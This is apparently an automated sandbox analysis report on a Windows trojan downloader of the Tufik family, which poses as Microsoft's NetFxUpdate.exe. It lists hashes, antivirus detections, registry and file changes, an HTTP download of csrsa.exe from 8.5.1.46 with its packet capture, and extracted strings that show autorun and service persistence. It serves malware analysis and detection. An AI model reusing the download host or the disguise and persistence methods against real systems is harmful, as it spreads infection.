Analysis Date2015-01-20 14:44:26
MD5724a9bb9b8810c95e5f74a93543c9e88
SHA1b7f5ac31d8a46769d0e00671ffcd14fb4021e3e7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 465b02f9605a3a3b9b95975c47f9b25c sha1: 5bc8fe127f947a5ea166a37ff57083d01a68dc1a size: 61440
Section.data md5: 67b469c7cc91d2bff416249a814e3b01 sha1: 7f761d445199872f25559383d32ded1a4d865283 size: 4096
Section.rsrc md5: cca2bffa2581251e672ff9496efd38a2 sha1: 8765781dbf9a3f0b03e63561b23482a9aaa75ebf size: 4096
Section.text md5: 003e4ffc050a5705edb09203498586ed sha1: 0cd8ce455c51792d7f36134fd8efacf03e6ef3fd size: 8192
Timestamp2006-08-04 22:36:12
Pdb pathnetfxupdate.pdb
VersionLegalCopyright: Copyright (C) 2004
InternalName: NetFxUpdate
FileVersion: 1,0,3705,3
CompanyName: Microsoft
ProductName: NetFxUpdate Application
ProductVersion: 1, 0, 3705, 0
FileDescription: NetFxUpdate Application
OriginalFilename: NetFxUpdate.exe
PEhashbafbdabe48ac7b424d67a6e02b43bdb443641a2d
IMPhashc93fb3b3067c891bb5db2cf4ac13c7cc
AV360 SafeVirus.Win32.TuFik.C
AVAd-AwareWin32.Tufik.P
AVAlwil (avast)Tufik:Win32:Tufik
AVArcabit (arcavir)Win32.Tufik.P
AVAuthentiumW32/Tufik.A.gen!Eldorado
AVAvira (antivir)TR/Dldr.Genome.agor
AVBullGuardWin32.Tufik.P
AVCA (E-Trust Ino)Win32/tufik.J
AVCAT (quickheal)W32.Tufik.gen
AVClamAVTrojan.Downloader-98394
AVDr. WebTrojan.DownLoader.4268
AVEmsisoftWin32.Tufik.P
AVEset (nod32)Win32/Tufik.NAA virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Tufik.A.gen!Eldorado
AVF-SecureWin32.Tufik.P
AVGrisoft (avg)Win32/Tufik.A
AVIkarusVirus.Win32.Tufik
AVK7Trojan-Downloader ( 00132cab1 )
AVKasperskyVirus.Win32.Pioneer.ak
AVMalwareBytesno_virus
AVMcafeeW32/Tufik
AVMicrosoft Security EssentialsVirus:Win32/Tufik.D
AVMicroWorld (escan)Win32.Tufik.P
AVRisingWin32.Tufik.p
AVSophosW32/Tufik-Fam
AVSymantecW32.Tufik.B!inf
AVTrend MicroPE_TUFIK.JK
AVVirusBlokAda (vba32)Virus.Expiro.ad

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.mdmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\wuauclt.exe.hdmp
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Setup.exe
Creates File\Device\Afd\AsyncConnectHlp
Creates Mutexopen
Winsock DNS8.5.1.46
Winsock URLhttp://8.5.1.46/csrsa.exe

Network Details:

DNS85773.com
Type: A
8.5.1.46
HTTP GEThttp://8.5.1.46/csrsa.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1032 ➝ 8.5.1.46:80

Raw Pcap
0x00000000 (00000)   47455420 2f637372 73612e65 78652048   GET /csrsa.exe H
0x00000010 (00016)   5454502f 312e310d 0a416363 6570743a   TTP/1.1..Accept:
0x00000020 (00032)   202a2f2a 0d0a4163 63657074 2d456e63    */*..Accept-Enc
0x00000030 (00048)   6f64696e 673a2067 7a69702c 20646566   oding: gzip, def
0x00000040 (00064)   6c617465 0d0a5573 65722d41 67656e74   late..User-Agent
0x00000050 (00080)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000060 (00096)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000070 (00112)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000080 (00128)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000090 (00144)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000a0 (00160)   6f73743a 20382e35 2e312e34 360d0a43   ost: 8.5.1.46..C
0x000000b0 (00176)   6f6e6e65 6374696f 6e3a204b 6565702d   onnection: Keep-
0x000000c0 (00192)   416c6976 650d0a0d 0a                  Alive....


Strings
~1
0\
. 00-+ 
.
00000000
1, 0, 3705, 0
1,0,3705,3
CompanyName
Copyright (C) 2004
FileDescription
FileVersion
                                 H
         (((((                  H
         h((((                  H
        h((((                  H
InternalName
LegalCopyright
Microsoft
"Microsoft .NET Framework %s UpdatecUpdates assemblies and generates native images for the Microsoft .NET Framework %s after rebooting.
NetFxUpdate
NetFxUpdate Application
NetFxUpdate.exe
(null)
OriginalFilename
ProductName
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
"+^ +]
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
[%04d-%02d-%02d %02d:%02d:%02d] 
A buffer overrun has been detected which has corrupted the program's
advapi32.dll
ADVAPI32.dll
A security error of unknown cause has been detected which has
August
.?AVCSException@@
.?AVtype_info@@
btFHt+
Buffer overrun detected!
ChangeServiceConfig2A
CloseHandle
CloseServiceHandle
Command-line arguments: %s
continue execution and must now be terminated.
ControlService
CorExitProcess
corrupted the program's internal state.  The program cannot safely
CreateEventA
CreateFileA
CreateMutexA
CreateProcessA
CreateServiceA
CreateThread
Creating mutex '%s' without owning it.
`.data
dddd, MMMM dd, yyyy
December
DeleteCriticalSection
DeleteService
DOMAIN error
EnterCriticalSection
Error (0x%08x): %s
Error: an internal error has occured.
Error: A timeout occured while waiting for the system to be ready.
Error: Could not allocate %d bytes for the command buffer.
Error: Could not allocate %d bytes for the value buffer.
Error: Could not allocate the registry value buffer.
Error: Could not allocate the version buffer.
Error: Could not delete the service for %s.
Error: Could not execute the command.
Error: Could not get the module file name.
Error: Could not open '%s' for read access.
Error: Could not read from file.
Error: Could not start the processing thread.
Error: Could not start the service control dispatcher.
Error: Could not start the service for %s.
Error: Failed to get the command-line arguments.
Error: Failed to process the command-line arguments.
Error: Failed to write auto-run registry keys.
Error: Function OpenSCManager failed.
Error: Invalid command-line arguments.
Error: The command-line parameters are incorrect.
Error: The .NET Framework version was not copied.
Error: The registry value '%s' was not deleted.
Error: The service control handler was not registered.
Error: The service could not be started for %s.
Error: The service %s could not be opened.
Error: The service %s could not be registered.
Error: The service was already running for %s.
Error: the synchronization events were not initialized.
Executing '%s'...
ExitProcess
F,98uX
February
(f@f;F
- floating point not loaded
FlushFileBuffers
FormatMessageA
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
GAC + NI NID
gacutil.exe
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetExitCodeProcess
GetFileType
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetModuleFileNameA
GetModuleHandleA
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemDirectoryA
GetSystemInfo
GetSystemTimeAsFileTime
GetTempPathA
GetTickCount
GetUserObjectInformationA
GetVersionExA
GetVolumeInformationA
GetWindowsDirectoryA
Global\
`h````
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
HHtjHHtF
HHtZHHtV
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InterlockedExchange
internal state.  The program cannot safely continue execution and must
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
JanFebMarAprMayJunJulAugSepOctNovDec
January
kernel32.dll
KERNEL32.dll
kuLoadLibraryA
LCMapStringA
LCMapStringW
LeaveCriticalSection
LoadLibraryA
LoadStringA
LocalFree
Lock '%s' was acquired.
Lock '%s' was not acquired: %d
Looking for pending file renames for %s.
MessageBoxA
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
mscoree.dll
MultiByteToWideChar
Mutex released.
NetFxUpdate_
netfxupdate.pdb
No pending file renames were found.
- not enough space for arguments
- not enough space for environment
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
now be terminated.
(null)
October
Opening the service for %s...
OpenSCManagerA
OpenServiceA
Pausing for %d seconds...
PendingFileRenameOperations
Pending file renames were found.
Please contact the application's support team for more information.
PPPPPPPP
ppxxxx
Processing [HKEY_LOCAL_MACHINE\%s]...
Processing '%s'...
Program: 
<program name unknown>
- pure virtual function call
QPPPPP
QQ.exe
QQSVW3
QQSVWd
QueryPerformanceCounter
RaiseException
ReadFile
Reading command-line arguments from [HKEY_LOCAL_MACHINE\%s]...
Read '%s' from the registry.
Recycler
RegCloseKey
RegDeleteValueA
RegEnumValueA
Registering the service control handler for %s...
Registering the service for %s...
RegisterServiceCtrlHandlerA
RegisterServiceCtrlHandlerExA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
ReleaseMutex
Removed successfully.
Removing auto-run registry key(s) for %s...
Removing [HKEY_LOCAL_MACHINE\%s] %s...
[rename]
ResetEvent
RtlUnwind
Running Windows%s %d.%d.%d %s.
runtime error 
Runtime Error!
Saturday
September
ServicesActive
SetEndOfFile
SetEvent
SetFilePointer
SetHandleCount
SetLastError
SetServiceStatus
SetStdHandle
SetUnhandledExceptionFilter
shell32
SING error
SOFTWARE\Microsoft\.NETFramework\PendingUpdates
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Starting the service for %s...
StartServiceA
StartServiceCtrlDispatcherA
Stopping and un-registering the service for %s...
\StringFileInfo\00000000\FileDescription
\StringFileInfo\00000000\FileVersion
Sunday
SunMonTueWedThuFriSat
%s v%s
SWjD_W
sXS;7|D;w
SYSTEM\CurrentControlSet\Control\Session Manager
t2WWVPVSW
TerminateProcess
.text 
@.text 
The description was registered for service %s.
The process returned %d.
The service for %s was deleted successfully.
The service for %s was started successfully.
The service %s was opened successfully.
The service %s was registered successfully.
The system drive is formatted as %s.
This application has requested the Runtime to terminate it in an unusual way.
!This program cannot be run in DOS mode.
Thursday
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
t!SS9]
t#SSUP
t.;t$$t(
Tuesday
t$$VSS
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
Unknown security failure detected!
URLDownloadToFileA
Urlmon
user32
user32.dll
USER32.dll
uShellExecuteA
Using default command-line arguments '%s'.
u"WWWW
VC20XC00U
vCloseHandle
vCreateFileA
vCreateFileMappingA
vCreateMutexA
vCreateThread
VerQueryValueA
VERSION.dll
vFindClose
vFindFirstFileA
vFindNextFileA
vGetDriveTypeA
vGetFileSize
vgethostbyname
vGetLastError
vGetLocalTime
vGetLogicalDriveStringsA
vGetTempPathA
vGlobalAlloc
vGlobalFree
vinet_ntoa
VirtualAlloc
VirtualFree
VirtualProtect
VirtualQuery
vlstrcatA
vlstrcmpA
vlstrcpyA
vlstrlenA
vMapViewOfFile
v	N+D$
vSetEndOfFile
vSetFilePointer
vSleep
vUnmapViewOfFile
vWriteFile
vWs2_32
vWSAStartup
WaitForMultipleObjects
WaitForSingleObject
Warning: a request was made to pause the service.
Warning: a request was made to stop the service.
Warning: File '%s' may not exist.
Warning: No processing when pending file renames exist.
Warning: The key [HKEY_LOCAL_MACHINE\%s] was not found.
Warning: The process was terminated. The process will be restarted after a reboot.
Warning: The process was terminated. The process will be restarted when the service continues.
Warning: The service could not be stopped. It will be removed after a reboot.
Warning: The service for %s was already marked for deletion.
Warning: The service %s was already registered.
Warning: The value does not exist.
Wednesday
WideCharToMultiByte
WINDOW
\wininit.ini
WriteFile
Writing auto-run registry key for %s...
Writing command-line arguments '%s' to [HKEY_LOCAL_MACHINE\%s...
Writing '%s' to [HKEY_LOCAL_MACHINE\%s] %s...
Wrote auto-run registry keys successfully.
Wrote command-line arguments successfully.
wRtlMoveMemory
wshlwapi
wStrStrIA
WWWWVSW
_^][YY